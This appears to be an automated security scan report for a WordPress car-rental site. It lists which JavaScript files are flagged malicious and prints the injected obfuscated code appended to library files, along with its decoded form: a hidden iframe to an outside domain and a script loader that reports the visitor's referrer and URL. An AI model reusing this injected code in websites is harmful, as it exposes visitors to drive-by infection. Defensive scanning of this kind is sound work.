Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=uscarearentals.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.uscarearentals.com/ | 200 OK Content-Length: 6486 Content-Type: text/html | clean |
http://www.uscarearentals.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 1894 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; ;var O0l='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADMJhCZslGaDRmblBHch5yTx8kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTx8EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/1/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script'); I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = docu I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O1O.appendChild(I00);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.uscarearentals.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 2372 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/1/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script'); I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = docu I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O1O.appendChild(I00);document.write(unescape(_escape)); Antivirus reports:
| ||
http://static.ak.fbcdn.net/connect.php/js/FB.Loader?ver=322597 | 200 OK Content-Length: 164028 Content-Type: application/x-javascript | clean |
http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=322597 | 200 OK Content-Length: 164028 Content-Type: application/x-javascript | clean |
http://www.uscarearentals.com/?page_id=15 | 200 OK Content-Length: 8543 Content-Type: text/html | clean |
http://www.uscarearentals.com/?page_id=162 | 200 OK Content-Length: 59178 Content-Type: text/html | clean |
http://www.uscarearentals.com/wp-includes/js/jquery/jquery.js?ver=1.6.1 | 200 OK Content-Length: 92949 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("<!doctype><html><body>;var O0l='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2 Antivirus reports:
| ||
http://www.uscarearentals.com/wp-content/plugins/wp-property/third-party/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.7.3 | 200 OK Content-Length: 17210 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.onerror=v.onload=null;G&&G.abort();m.empty()},O=function(){if(false===e.onError(o,q,e)){t.hide();h=false}else{e.titleShow=false;e.width="auto";e.height="auto";m.html('<p id Antivirus reports:
| ||
http://www.uscarearentals.com/wp-content/plugins/wp-property/templates/wp_properties.js?ver=1.16.2 | 200 OK Content-Length: 1799 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { jQuery("a.fancybox_image").fancybox({ 'transitionIn' : 'elastic', 'transitionOut' : 'elastic', 'speedIn' : 600, 'speedOut' : 200, 'overlayShow' : false }); }); ;var O0l='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADMJhCZslGaDRmblBHch5yTx8kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTx8EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSV Antivirus reports:
| ||
http://www.uscarearentals.com/wp-content/plugins/wp-property/js/jquery.address-1.3.2.js?ver=3.2.1 | 200 OK Content-Length: 34739 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($) { $.address = (function () { var _trigger = function(name) { $($.address).trigger( $.extend($.Event(name), (function() { var parameters = {}, parameterNames = $.address.parameterNames(); for (var i = 0, l = parameterNames.length; i < l; i++) { parameters Antivirus reports:
| ||
http://www.uscarearentals.com/?page_id=142 | 200 OK Content-Length: 20923 Content-Type: text/html | clean |
http://www.uscarearentals.com/?page_id=155 | 200 OK Content-Length: 39942 Content-Type: text/html | clean |
http://www.uscarearentals.com/?page_id=157 | 200 OK Content-Length: 26974 Content-Type: text/html | clean |
http://www.uscarearentals.com/?page_id=35 | 200 OK Content-Length: 8194 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: uscarearentals.com
Result:
GET / HTTP/1.1
Host: uscarearentals.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: uscarearentals.com
Referer: http://www.google.com/search?q=uscarearentals.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: uscarearentals.com
Referer: http://www.google.com/search?q=uscarearentals.com
Result:
The result is similar to the first query. There are no suspicious redirects found.